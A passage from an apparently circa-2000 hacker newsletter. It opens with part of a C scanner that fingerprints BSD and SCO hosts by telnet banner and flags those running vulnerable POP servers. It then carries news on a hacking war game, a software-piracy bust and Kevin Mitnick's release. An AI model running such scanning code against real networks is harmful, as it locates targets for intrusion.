if((strstr(buf, "SCO")) != NULL) { strcpy(printip, ip); if ((temp1=strrchr(printip, '\n')) != NULL) bzero(temp1, 1); printf("%s: SCO Unix box running SCO pop.\n",printip); } } return; } // } checkos(char *ip, int spl) { int temp2; char printip[16]; unsigned long temp; temp = inet_addr(ip); temp2 = ADMtelnet(temp, 23); strcpy(printip, ip); if ((temp1=strrchr(printip, '\n')) != NULL) bzero(temp1, 1); if ((temp2 == 1)&&(spl==1)) printf("%s: OpenBSD box running vuln QPOP\n",printip); if ((temp2 == 1)&&(spl==2)) printf("%s: OpenBSD box running vuln UCB pop\n",printip); if ((temp2 == 2)&&(spl==1)) printf("%s: FreeBSD box running vuln QPOP\n",printip); if ((temp2 == 2)&&(spl==2)) printf("%s: FreeBSD box running vuln UCB pop\n",printip); if ((temp2 == 3)&&(spl==1)) printf("%s: BSDi box running vuln QPOP\n",printip); if ((temp2 == 3)&&(spl==2)) printf("%s: BSDi box running vuln UCB pop\n",printip); } int ADMtelnet (u_long ip, int port) { struct sockaddr_in sin; u_char buf[4000]; int dasock, len; int longueur = sizeof (struct sockaddr_in); dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); /* gimme a socket */ sin.sin_family = AF_INET; sin.sin_port = htons (port); sin.sin_addr.s_addr = ip; if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1) return (-1); while (1) { memset (buf, 0, sizeof (buf)); if ((len = read (dasock, buf, 1)) <= 0) break; if (*buf == (unsigned int) 255) { read (dasock, (buf + 1), 2); if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2)); else if ((u_char) * (buf + 1) == (unsigned int) 253) { *(buf + 1) = 252; write (dasock, buf, 3); } } else { if (*buf != 0) { bzero (buf, sizeof (buf)); read (dasock, buf, sizeof (buf)); usleep(40000); if((strstr(buf, "OpenBSD") != NULL)) return 1; if((strstr(buf, "FreeBSD") != NULL)) return 2; if((strstr(buf, "BSDI") != NULL)) return 3; sleep (1); } } } return 0; } @HWA 21,0 Hackunlimited special birthday free-cdrom offer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by noose http://www.hackunlimited.com/ Would you want to have all the files in Hackunlimited.com in CD, for free of fcourse ? Just send mailto noose@hackunlimited.com The message itself can be empty, just put the Subject to "Free CD" and you are part of our "lottery" :). You have time until 13th of February to send the message. 3 people will win the CD. The winners will be announced at 22th of February. The CD will include all files at http://www.hackunlimited.com + all the files in http://www.hackunlimited.com/raz0r The file list is available here: http://www.hackunlimited.com/cdlist.txt @HWA 22.0 HACK MY SYSTEM! I DARE YA! ~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.securiteam.com/securitynews/_Can_you_break_into_my_system__I_dare_you__.html Title "Can you break into my system? I dare you!" Summary We in Beyond Security believe that the only way to test your security is by trying to break it. But we're not as drastic as one Linux system administrator who took this one step further - he is asking attackers to try and break into a server he is administrating. Details Many administrators have to deal with potentially malicious users having legal accounts on their servers. Universities, ISPs and large companies have to consider the risk that local users, having access to the system as valid users, will sometime try to elevate their privileges. The system administrator of zeus-olympus.yi.org assumes that some of his users are 'evil'. Although he is confident that his Linux system is secured, he would like others to do their best to attack his system. He therefore provided two user accounts that have normal user access to the system, and he allows anyone who wishes to use those accounts and gain entry to the server. Once logged in, the users are free to try and compromise the system's security, with no strings attached. The only 'catch' is that once vulnerability is found, it should be reported immediately, so that the hole can be closed. This offer is extremely unique. There have been 'hacking' contests in the past (usually by commercial companies trying to show that their product is secure), but this is one of the first time that an administrator is offering full access to the machine (using a valid user account) - which of course makes this game much more interesting. Therefore, if you would like to try and break a Linux Redhat machine, join this war game and give it your best shot. Additional information To join the contest, visit http://zeus-olympus.yi.org/ and enter the 'password required' section. The login is: war and the password is game. Upon entering this section, you will receive the account information needed to log into the server. Feel free to give Danny some feedback about his war game: dannyw@mediaone.net. @HWA 23.0 PWA lead member busted by the FBI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by TRDonJuan http://www.suntimes.com/output/news/ware04.html Software pirating ring cracked by local FBI February 4, 2000 BY LORRAINE FORTE STAFF REPORTER Chicago FBI agents say they have broken up a worldwide ring of software thieves--called the "Pirates with Attitude"--who were distributing thousands of programs, including the yet-unreleased Windows 2000. A tip from an informant in Chicago led to the breakup of "one of the most sophisticated and longest-standing" piracy and hacking rings, according to a complaint filed Thursday in federal court in Chicago. The FBI used the informant's access codes to break into the group's Web site and obtain a roster of the suspects. Robin Rothberg was arrested Thursday at his home in New Chelmsford, Mass., near Boston. Federal officials say he was a founder and key member of the ring, which evaded law enforcement for eight years. He is charged with conspiring to infringe copyright. Three days before Christmas, Rothberg somehow got a copy of Windows 2000--the latest update of the operating system, scheduled to go on sale next month--and uploaded it to the Internet, according to the criminal complaint. Rothberg, an employee of NEC Technologies, accessed the group's Internet site through a Zenith Data Systems computer server in Buffalo Grove, the complaint states. At least two other users allegedly pirated and distributed software through servers in Chicago, at MegsInet Inc. on West Ohio and at Computer Engineers Inc. on North Wacker. Members of the group downloaded software in exchange for uploading other programs, said Assistant U.S. Attorney Lisa Griffin. They might then give away or sell that software. "It was a barter system, with the upshot being that the site itself contained an incredible amount of software," Griffin said. FBI spokesman Ross Rice said the investigation is continuing. Authorities do not yet know the size of the pirating ring, or the monetary value of the thousands of stolen software titles allegedly distributed from the group's WAREZ site, called Sentinel. WAREZ is a term for an Internet site that distributes pirated versions of software. The Sentinel site was launched in April 1996 and was set up so that only authorized users could access it; it was not available to the general public. The group's members were "carefully screened to minimize the risk of detection" and were given specific roles, such as "crackers," who stripped away the copy protection often embedded in commercial software; "couriers," who transferred large volumes of software files from other pirating sites, and "suppliers," who brought in programs from major software companies. Rothberg, according to the complaint, stole at least nine other major Microsoft programs between June and October 1999. Microsoft did not respond Thursday to requests to comment on the case. An industry group, the Business Software Alliance, has said software theft costs 33,000 jobs and $11 billion a year. -=- http://www.bostonherald.com/bostonherald/lonw/comp02042000.htm FBI nabs Chelmsford man in software piracy ring by Andrea Estes Friday, February 4, 2000 Federal officials say they've captured a leader of a worldwide band of e-pirates who surf the cyberseas in search of software plunder. Robin Rothberg, 32, of Chelmsford, is a founding member of Pirates with Attitudes, an international crew that steals popular titles from powerful companies and gives them away to its members for free, the FBI says. The group, snared by FBI agents in Chicago, is sophisticated and devious enough to have sought after software before it hits the shelves, authorities said. In December, FBI agents found Windows 2000 - which still hasn't been released - and Office 2000 premium, a program given to select customers for testing purposes. In all, agents found enough software to fill the memory of 1,200 average-sized personal computer hard drives. Rothberg, who until last week was a notebook software engineer for NEC Computer Services in Acton, was arrested yesterday and charged with conspiracy in U.S. District Court in Boston. Wearing a long ponytail and black leather jacket, he pleaded not guilty and was released without bail. According to an FBI affidavit, Pirates with Attitudes is a highly structured organization with different members assigned different tasks. ``Suppliers'' steal the programs from major software companies. ``Couriers'' deliver the files to PWA and ``crackers'' strip away the security codes that prevent piracy. The group, overseen by a council, screens members to ``minimize the risk of detection by authorities,'' according to an affidavit filed by FBI Special Agent Michael Snyder of Chicago. Rothberg, who is alleged to be a member of the council, was arrested after an informant helped steer Snyder, an MBA and computer expert, through its maze-like system. Agents located PWA's internet site, ``Sentinel,'' which is accessible only to authorized users. ``Members maintain access to PWA's site by providing files, including copyrighted software files obtained from other sources, and in turn are permitted to copy files provided by other users,'' wrote Snyder. ``Using the confidential informant's access codes, FBI agents logged onto Sentinel and viewed a directory listing thousands of copyrighted software titles available for downloading by PWA members,'' he wrote. So far only Rothberg has been arrested. Chicago authorities yesterday said the investigation is continuing. ``In the simplest terms, it's an organization that allowed its members to upload software to a site configured so it could store a substantial amount of software,'' said assistant United States Attorney Lisa Griffin. ``They could then download it into their own computers.'' Members give and take what they wish, officials said. ``It's a two-way street,'' said Randy Sanborn, spokesman for the United States Attorney's Office in the Northern District of Illinois. Officials wouldn't say whether members have to pay anything - such as a membership fee - for the service. Rothberg was downsized out of his job last week when the division he worked for ceased to exist, according to an NEC spokeswoman, who said the company has no plans to investigate Rothberg's job performance. Rothberg asked Magistrate Judge Robert Collings for permission to travel to California today for a job interview. And Rothberg said he had several more planned, his attorney Joseph Savage told Collings. Collings ordered him to stay off his computer except to look for a job, let the FBI spot check his e-mail, and get the court's permission if he wants to travel outside the Bay State. @HWA 24.0 Mitnick's Release Statement ~~~~~~~~~~~~~~~~~~~~~~~~~~~ I debated wether or not to include this in this issue since the news is saturated with Mitnick stories right now (at least they're taking notice) and decided it was valid to include it here in our archives. There are many more articles available on Mitnick, so i've just included his release statement. Check out the sites http://www.freekevin.com/ or http://www.2600.com/ for more info Mitnick's Release Statement: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ January 21, 2000 Kevin Mitnick read the statement shown below upon his release from federal custody in Lompoc, California after nearly 5 years behind bars. Mr. Mitnick is the copyright holder of this statement, and hereby gives permission for limited reuse and republication under the Fair Use doctrine of U.S. Copyright Law. All other rights reserved. Good morning. Thank you all for taking the time to come out to Lompoc today, my first day of freedom in nearly five years. I have a brief statement to read, and I ask that you permit me to read my statement without interruption. First, I'd like to thank the millions of people who have visited the website kevinmitnick.com during my incarceration, and who took the time to show their support for me during the past five years. I relied on their support during the five years I've been incarcerated more than they will ever realize, and I want to thank them all from the bottom of my heart. As many of you know, I've maintained virtually complete silence during my incarceration -- I've refused dozens of requests for interviews from news organizations from around the world, and for very real reasons -- my actions and my life have been manipulated and grossly misrepresented by the media since I was 17, when the Los Angeles Times first violated the custom, if not the law, that prohibits publication of the names of juveniles accused of crimes. The issues involved in my case are far from over, and will continue to affect everyone in this society as the power of the media to define the "villain of the month" continues to increase. You see, my case is about the power of the media to define the playing field, as well as the tilt of that playing field -- it's about the power of the media to define the boundaries of "acceptable discussion" on any particular issue or story. My case is about the extraordinary breach of journalistic ethics as demonstrated by one man, John Markoff, who is a reporter for one of the most powerful media organizations in the world, the New York Times. My case is about the extraordinary actions of Assistant U.S. Attorneys David Schindler and Christopher Painter to obstruct my ability to defend myself at every turn. And, most importantly, my case is about the extraordinary favoritism and deference shown by the federal courts toward federal prosecutors who were determined to win at any cost, and who went as far as holding me in solitary confinement to coerce me into waiving my fundamental Constitutional rights. If we can't depend on the courts to hold prosecutors in check, then whom can we depend on? I've never met Mr. Markoff, and yet Mr. Markoff has literally become a millionaire by virtue of his libelous and defamatory reporting -- and I use the word "reporting" in quotes -- Mr. Markoff has become a millionaire by virtue of his libelous and defamatory reporting about me in the New York Times and in his 1991 book "Cyberpunk." On July 4th, 1994, an article written by Mr. Markoff was published on the front page of the New York Times, above the fold. Included in that article were as many as 60 -- sixty! -- unsourced allegations about me that were stated as fact, and that even a minimal process of fact-checking would have revealed as being untrue or unproven. In that single libelous and defamatory article, Mr. Markoff labeled me, without justification, reason, or supporting evidence, as "cyberspace's most wanted," and as "one of the nation's most wanted computer criminals." In that defamatory article, Mr. Markoff falsely claimed that I had wiretapped the FBI -- I hadn't -- that I had broken into the computers at NORAD -- which aren't even connected to any network on the outside -- and that I was a computer "vandal," despite the fact that I never damaged any computer I've ever accessed. Mr. Markoff even claimed that I was the "inspiration" for the movie "War Games," when a simple call to the screenwriter of that movie would have revealed that he had never heard of me when he wrote his script. In yet another breach of journalistic ethics, Mr. Markoff failed to disclose in that article -- and in all of his following articles about me -- that we had a pre-existing relationship, by virtue of Mr. Markoff's authorship of the book "Cyberpunk." Mr. Markoff also failed to disclose in any of his articles about this case his pre-existing relationship with Tsutomu Shimomura, by virtue of his personal friendship with Mr. Shimomura for years prior to the July 4, 1994 article Mr. Markoff wrote about me. Last but certainly not least, Mr. Markoff and Mr. Shimomura both participated as de facto government agents in my arrest, in violation of both federal law and jounalistic ethics. They were both present when three blank warrants were used in an illegal search of my residence and my arrest, and yet neither of them spoke out against the illegal search and illegal arrest. Despite Mr. Markoff's outrageous and libelous descriptions of me, my crimes were simple crimes of trespass. I've acknowledged since my arrest in February 1995 that the actions I took were illegal, and that I committed invasions of privacy -- I even offered to plead guilty to my crimes soon after my arrest. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence. My case is a case of curiosity -- I wanted to know as much as I could find out about how phone networks worked, and the "ins" and "outs" of computer security. There is NO evidence in this case whatsoever, and certainly no intent on my part at any time, to defraud anyone of anything. Despite the absence of any intent or evidence of any scheme to defraud, prosecutors Schindler and Painter refused to seek a reasonable plea agreement -- indeed, their first "offer" to me included the requirement that I stipulate to a fraud of $80 million dollars, and that I agree never to disclose or reveal the names of the companies involved in the case. Have you ever heard of a fraud case where the prosecutors attempted to coverup the existence of the fraud? I haven't. But that was their method throughout this case -- to manipulate the amount of the loss in this case, to exaggerate the alleged harm, to cover up information about the companies involved, and to solicit the companies involved in this case to provide falsified "damages" consistent with the false reputation created by Mr. Markoff's libelous and defamatory articles about me in the New York Times. Prosecutors David Schindler and Christopher Painter manipulated every aspect of this case, from my personal reputation to the ability of my defense attorney to file motions on time, and even to the extent of filing a 1700 item exhibit list immediately before trial. It was the prosecutors' intent in this case to obstruct justice at every turn, to use the unlimited resources of the government and the media to crush a defendant who literally had no assets with which to mount a defense. The fact of the matter is that I never deprived the companies involved in this case of anything. I never committed fraud against these companies. And there is not a single piece of evidence suggesting that I did so. If there was any evidence of fraud, do you really think the prosecutors in this case would have offered me a plea bargain? Of course not. But prosecutors Schindler and Painter would never have been able to violate my Constitutional rights without the cooperation of the United States federal court system. As far as we know, I am the only defendant in United States' history to ever be denied a bail hearing. Recently, Mr. Painter claimed that such a hearing would have been "moot," because, in his opinion, the judge in this case would not have granted bail. Does that mean that the judge in this case was biased against me, and had her mind made up before hearing relevant testimony? Or does that mean that Mr. Painter believes it is his right to determine which Constitutional rights defendants will be permitted to have, and which rights they will be denied? The judge in this case consistently refused to hold the prosecutors to any sort of prosecutorial standard whatsoever, and routinely refused to order the prosecutors to provide copies of the evidence against me for nearly four years. For those of you who are new to this case, I was held in pre-trial detention, without a bail hearing and without bail, for four years. During those four years, I was never permitted to see the evidence against me, because the prosecutors obstructed our efforts to obtain discovery, and the judge in this case refused to order them to produce the evidence against me for that entire time. I was repeatedly coereced into waiving my right to a speedy trial because my attorney could not prepare for trial without being able to review the evidence against me. Please forgive me for taking up so much of your time. The issues in this case are far more important than me, they are far more important than an unethical reporter for the New York Times, they're far more important than the unethical prosecutors in this case, and they are more important than the judge who refused to guarantee my Constitutional rights. The issues in this case concern our Constitutional rights, the right of each and every one of us to be protected from an assault by the media, and to be protected from prosecutors who believe in winning at any cost, including the cost of violating a defendant's fundamental Constitutional rights. What was done to me can be done to each and every one of you. In closing, let me remind you that the United States imprisons more people than any other country on earth. Again, thank you for taking time out of your busy lives to come to Lompoc this morning, and thank you all for your interest and your support. @HWA 24.1 More submitted Mitnick articles ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributions by Zym0t1c Hacker Mitnick released Friday For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again? Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early friday morning... Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future. Read the article online at: http://www.zdnet.com/zdnn/stories/news/0,4586,2425165,00.html Read the (fine but short) dutch article at: http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4462 Since this is *big* news, you can stay here and read the ASCII-version: Hacker Mitnick released Friday By Kevin Poulsen, ZDNet News UPDATED January 21, 2000 9:30 AM PT For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again? Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early friday morning... Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future. The 36-year-old hacker was greeted at the gate by friends and family members. His mother will drive him to Los Angeles, where his first order of business will be to obtain a driver's license, report to his new probation officer and see a doctor about injuries he suffered in a prison bus accident last year. "He's having neck pains, and back and shoulder pains," said Reba Vartanian, Mitnick's grandmother. "He hasn't had a regular doctor in five years." A free man for the first time since 1995, he will live in the Los Angeles suburb of Westlake Village with his father, Alan Mitnick, a general contractor. Less clear is what Mitnick is going to do for a living. Under court order, the hacker is banned for three years from using any kind of computer equipment without the prior written permission of his probation officer -- a restriction that even the court acknowledged would affect his employability. "He's experiencing a lot of frustration over the things he can't do," said Eric Corley, editor of the hacker magazine 2600 and the leader of a "Free Kevin" grass-roots movement. "Keep in mind this is someone who's been kept away from these things for five years, and when he gets out he won't even be able to touch them." Does incarceration cure an addict? The restrictions, and long history of recidivism, make one former friend and partner-in-crime pessimistic about Mitnick's future. "Do you cure a drug addict or alcoholic by incarceration on its own?" asked Lew DePayne, rhetorically. "Do you cure him by taking away his ability to earn a living?" Mitnick and DePayne became friends in the late 1970s, when they were both teenagers. Together, they explored and manipulated the telephone network as Los Angeles' most notorious "phone phreaks." In the 1980s, DePayne seemingly dropped out of the scene, while Mitnick moved on to corporate computers and networks, developing a penchant for cracking systems in search of proprietary "source code," the virtual blueprints for a computer program or operating system. Mitnick had already been in a series of minor skirmishes with the law when, in 1989, he suffered his first adult felony conviction for cracking computers at Digital Equipment Corp. and downloading source code. He served one year in federal custody, followed by three years of supervised release. In 1992, Mitnick was charged with a violation of his supervision for associating with DePayne again. He went underground and online, using the Internet to crack computers belonging to such cell phone and computer makers as Motorola (NYSE: MOT), Fujtsu and Sun Microsystems (Nasdaq: SUNW) and to copy more proprietary source code. The FBI captured him on Feb. 15, 1995, when computer security expert Tsutomu Shimomura suffered an attack on his machine and responded by tracking Mitnick to his hideout in Raleigh, N.C. Shimomura and New York Times reporter John Markoff went on to write the book "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It." Shimomura and Markoff sold the movie rights to Miramax Films, who cast Skeet Ulrich as Mitnick. But since shooting wrapped on the project in December 1998 the movie has languished on the shelf with no known theatrical release date, surrounded by swirling rumors of a direct-to-video or cable TV release. Miramax publicists didn't return telephone inquiries about the project. Mitnick's arrest began a series of courtroom battles over procedures and evidence that finally ended last year in a plea agreement. The hacker pleaded guilty in March 1999 to seven felonies and admitted to his Internet hacking. In August 1999, Judge Marianna Pfaelzer sentenced him to 46 months in prison, on top of an earlier 22 months sentence for the supervision violation and cell phone cloning. With credit for his lengthy period of pretrial custody, and some time off for good behavior, Mitnick's served just under five years in prison. "My sincere hope is that he gets his act together and complies with the conditions of his supervised release and doesn't engage in further hacking activity," said Assistant U.S. Attorney Christopher Painter, one of Mitnick's two federal prosecutors. Painter's work on the Mitnick case helped propel him to a position as deputy chief of the U.S. Department of Justice's computer crime and intellectual property section in Washington, D.C. He begins at the DOJ in March. "I think that the significance of this case is that he was so prolific. He not only had done this once before, but he did it on such a large scale," Painter said. "If past ends up being prologue, then certainly we'll go back to court and deal with it at that time." From hacking to ham? Greg Vinson, one of Mitnick's defense attorneys, foresees a rosier future for the hacker, perhaps with a job that exploits his famous ability to "social engineer" people into doing his bidding. "I think he's had a number of different offers to kind of do PR-type of work," said Vinson, who also points out that Mitnick might still get a computer job. "You have to remember the order says, 'Without the prior express permission of the probation office.' So it's not absolutely prohibited." If Mitnick can't use computers, he reportedly hopes to indulge his love for technology by returning to amateur radio, a childhood passion. Federal Communications Commission records show that Mitnick's license expired last month. According to Kimberly Tracey, a ham radio operator in Los Angeles and a friend of Mitnick's, he's been scrambling to renew it. "This is going to be part of Kevin's life, because they've taken away computers and everything else," said Tracey. "I hope they don't take away this." Mitnick was unavailable for comment on his imminent release. Sources close to the hacker say he granted the CBS news show "60 Minutes" an exclusive interview last week, which is scheduled to air Sunday. But in an interview with ZDNet News last July, Mitnick complained about his treatment by the government prosecutors, who he said were "grossly exaggerating the losses in the case and the damages I caused." (See: Mitnick says, "I was never a malicious person.") DePayne: Anger a major stumbling block DePayne, Mitnick's former friend and co-defendant, worries that Mitnick's anger will work against him in his new life. "I don't know if that's ever going to go away; I don't know if he'll be able to deal with it," said DePayne, speaking from his home in Palo Alto. Calif., where he's serving six months house arrest for aiding Mitnick's hacking during his fugitive years. "That's going to be a major stumbling block for him going forward." DePayne said he last heard from Mitnick the night of his arrest, on a message left on his answering machine. Now 39 years old, divorced and heading a small Internet company of his own, DePayne insists he doesn't plan on associating with the impish hacker he first met as a brash teenager two decades ago. "I can't be fooling around with these stunts and practical jokes that Kevin might want to fool around with," said DePayne. "I'll miss Kevin. I won't miss the trouble he brings to the table." Kevin Poulsen is a former hacker. He writes a weekly column for ZDTV's CyberCrime. ____________________________________________________________________________ Mitnick: I was manipulated That's how hacker Kevin Mitnick feels after almost five years behind bars. Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years. Read the article online at: http://www.zdnet.com/zdnn/stories/news/0,4586,2425686,00.html?chkpt=zdnntop Since this is *big* news, you can stay here and read the ASCII-version: Mitnick: I was manipulated By Robert Lemos, ZDNet News UPDATED January 21, 2000 3:41 PM PT Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years. "Prosecutors ... manipulated every aspect of this case from my personal reputation, to the ability of my defense attorney to file motions in time, and even to the extent of filing a 1,700-item exhibit list immediately before a trial," said Mitnick, reading from a three-page statement to reporters gathered near the Lompoc, Calif. prison facility, minutes after being released from the medium-security prison. Almost five years ago, federal authorities arrested Mitnick on a 25-count indictment relating to misuse of Pacific Bell equipment for illegal wiretaps and copying proprietary source code from Motorola, Sun Microsystems Inc., NEC Corp. and Novell, among others. "My case is one of curiosity," said Mitnick. "There was no intent to defraud anyone of anything." New York Times' reporter John Markoff covered the latter portion of the two-and-a-half year pursuit of Mitnick, and in a July 4, 1994, article called him "Cyberspace's most wanted." Mitnick blames the hype surrounding his elusive flight from authorities and his subsequent arrest on Markoff's article. In addition, the 36-year old ex-hacker claims that Markoff crossed the line by bringing authorities and computer expert Tsutomu Shimomura together to track him down. Mitnick went as far as to call the article libelous and defamatory. In a Friday morning interview, Markoff stood by his reporting, saying that the allegations were "really disappointing to me because it suggests that in the past five years, and perhaps in the last 20 years, Kevin has not learned anything. What he might have learned from all his time in prison is that it is wrong to break into other people's computers. I don't think it is anymore complex than that." Markoff pointed out that Mitnick had been arrested five times in the last 20 years for computer-related crimes. "The problem is, and the reason the judge kept him away from computers, (is that) this is the fifth time that he has been arrested. It's not like they haven't given him chances," said Markoff. Markoff also denied any ethical breach. "I won't get into the specifics on those three cases," Markoff said. "I want to say that I stand by my story, and to note that it was written while Kevin was a fugitive from four law enforcement agencies, and that's why it was written." In court, Mitnick also claims he didn't get a fair shake. Looking tired and much thinner than five years ago, the bespectacled cybercriminal blamed prosecution for blocking his defense from acting on his behalf. "Their method (in) this case was to manipulate the amount of loss to exaggerate the alleged harm," he said. "I've acknowledged since my arrest in February, 1995, that the actions I took were illegal, and that I committed invasions of privacy. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence." Damages 'grossly inflated' In total, the prosecution estimated damages at $80 million by including the full R&D costs of the applications and source code that Mitnick copied, even though none of the code was ever sold to another company or is known to have been used by a competitor. "Everybody realizes that those (estimates) were greatly inflated," said Jennifer Granick, a San Francisco defense attorney, who represented hacker Kevin Poulsen in litigation following that hacker's release from prison. (Poulsen is a ZDNet News contributor.) The number may sound familiar. That's because David L. Smith, who plead guilty to writing and releasing the Melissa virus in December, similarly admitted to the prosecutor's assessed damages of $80 million. It's no coincidence: Under federal law that is the maximum amount accounted for by sentencing guidelines. In fact, it is usually the major factor in determining the length of jail time. That leads to a skewed pursuit of justice, said Granick. "The criminal courts are here to deal with societal wrongs," she said. "It is not their primary purpose to recompense the victims." "I hope that the Kevin Mitnick case is the last case of the great '80s hacker hysteria," she continued. "I hope that we won't have the same kind of hype in the future so that people can get a fair shake in the media and in court." The U.S. Attorney's office could not comment by press time. Kevin Poulsen contributed to this report. ____________________________________________________________________________ The case of the kung fu 'phreak' Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked. Read the article online at: http://www.zdnet.com/zdnn/stories/news/0,4586,2425425,00.html Since this is *big* news, you can stay here and read the ASCII-version: The case of the kung fu 'phreak' Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked. By Kevin Poulsen, ZDNet News January 21, 2000 11:59 AM PT Two days after computer security expert Tsutomu Shimomura suffered the now-legendary Christmas Day 1994 hack-attack that launched his search for Kevin Mitnick, a mysterious message left on his voice mail box added real-world menace to the cyberspace crime. "Damn you, my technique is the best," said an odd voice in a faux-British accent. "I know sendmail technique, and my style is much better ... Me and my friends, we'll kill you." Three days later the caller left another message, this time beginning with a kung fu scream and affecting the voice of an actor in a martial arts film: "Your security technique will be defeated. Your technique is no good." In a third message, on Feb. 4, 1995, the caller chided Shimomura, who he called "grasshopper," for mentioning the messages in a Newsweek article on the intrusion and for putting digitized copies on the Internet. "Don't you know that my kung fu is the best?" The taunting phone calls were presumed to be from Shimomura's intruder, and they became a fixture in the Shimomura vs. Mitnick manhunt story. Digitized copies can be found on the official Web site for Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It." The equation of hacking with kung fu fighting has become a cultural touchstone in its own right, and on more than one occasion the "Lone Gunmen" hackers on Fox's "The X-Files" have been heard to mutter, "My kung fu is the best." The real kung fu 'phreak' The only problem is, the thinly disguised voice never sounded at all like Kevin Mitnick, and two of the messages came after the hacker had been arrested. "I heard that this guy named Shimomura had been hacked ... So I just thought, What the hell, I'd leave some voice mails," says 31-year-old Zeke Shif. "I used to watch kung fu movies a lot." Under the handle "SN," Shif once had a solid reputation in the computer underground as a "phone phreak" (i.e., phone hacker). But he says that, by 1995, his fear of "The Man" had long since scared him straight; he simply succumbed to the temptation to make some prank phone calls. "I thought I'd be funny," says Shif, who like many hackers from the early 1990s has gone on to work in the computer security trade, for Virginia-based Network Security Technologies Inc. The matter became less amusing when Shif read the news reports on Feb. 15, 1995. "I found out Mitnick got caught, and they were trying to link that to the voice mail," says Shif, who responded by calling Shimomura again. "I left a pre-emptive messages, saying, listen, this has nothing to do with any Mitnick or anything, I'm just making fun of kung fu movies." And this time, he didn't call him grasshopper. ____________________________________________________________________________ Mitnick Released Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment. Read the article online at: http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2118614,00.html Since this is *big* news, you can stay here and read the ASCII-version: Mitnick Released Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment. By Iolande Bloxsom January 21, 2000 Convicted hacker Kevin Mitnick was released early this morning from federal prison in Lompoc, California. Possibly the most famous hacker ever, Mitnick was arrested in February of 1995, and has spent almost five years in prison. In a prepared statement, Mitnick had harsh words for both the media and federal prosecutors, both of whom he blamed for his long incarceration. The media "grossly misreported" his case and created what he called the "villain of the month." He also railed against the media for "defin[ing] what is 'acceptable discussion'." Mitnick singled out John Markoff, a reporter for The New York Times, accusing him of "libelous and defamatory reporting-- and I use the word reporting in quotes." He charged that Markoff's articles had facts that were untrue, that were unproven, and that Markoff failed to disclose a previous relationship. (Mitnick appeared in Cyberpunk, a book Markoff co-wrote with Katie Hafner in 1995.) Finally, Mitnick claimed that the journalist "is a millionaire" now because of his reporting on the convicted hacker. In a later interview with ZDTV's Janet Yee, Markoff said he stood by his reporting. However, Mitnick had equal censure for prosecutors David Schindler and Christopher Painter, who, he claimed "went as far as holding me in solitary confinement," to try to force him to plead guilty. He says, though, that his crime was one of trespass, rather than fraud. "I never deprived company's of anything... there was never any evidence of fraud." Mitnick pleaded guilty on March 26, 1999, to seven felonies, including unauthorized intrusion into computers at cellular telephone companies, software manufacturers, ISPs, and universities. He also admitted to illegally downloading proprietary software from some of these companies. In August, US District Court Judge Marianna Pfaelzer sentenced Mitnick to 46 months in prison and ordered him to pay $4,125 in restitution. She also ordered Mitnick not to touch a computer or cellular phone without written approval from his probation officer. The sentence, governed by a plea agreement between Mitnick and his prosecutors, ran on top of the 22 months he already received for cell-phone cloning and a probation violation, for a total of 68 months. With credit for his lengthy pretrial custody and some time off for good behavior, Mitnick served just less than five years in prison. Mitnick is headed back to Los Angeles, where his family lives. By Iolande Bloxsom January 21, 2000 ____________________________________________________________________________ Mitnick's Digital Divide /* This is news from two weeks ago, but still a headline */ It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991. Read the online article at: http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2128328,00.htm l Since this is *big* news, you can stay here and read the ASCII-version: Mitnick's Digital Divide It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991. By Kevin Poulsen January 12, 2000 On Friday, January 21, hacker Kevin Mitnick will go free after nearly five years behind bars. But when he walks out the gates of the Lompoc federal correctional institution in California, he'll be burdened with a crippling handicap: a court order barring him for up to three years from possessing or using computers, "computer-related" equipment, software, and anything that could conceivably give him access to the Internet. These anti-computer restrictions are even more ridiculous today than when I faced them upon leaving federal custody in June, 1996. In the wired world of 2000, you'd be hard pressed to find a job flipping burgers that didn't require access to a computerized cash register, and three years from now McDonald's applicants will be expected to know a little Java and a smattering of C++. Since Mitnick's arrest in 1995, the Internet has grown from a hopeful ditty to a deafening orchestral roar rattling the windows of society. The importance of computer access in America has been acknowledged by the White House in separate initiatives to protect technological infrastructure from "cyberterrorists," and to bridge the so-called digital divide between 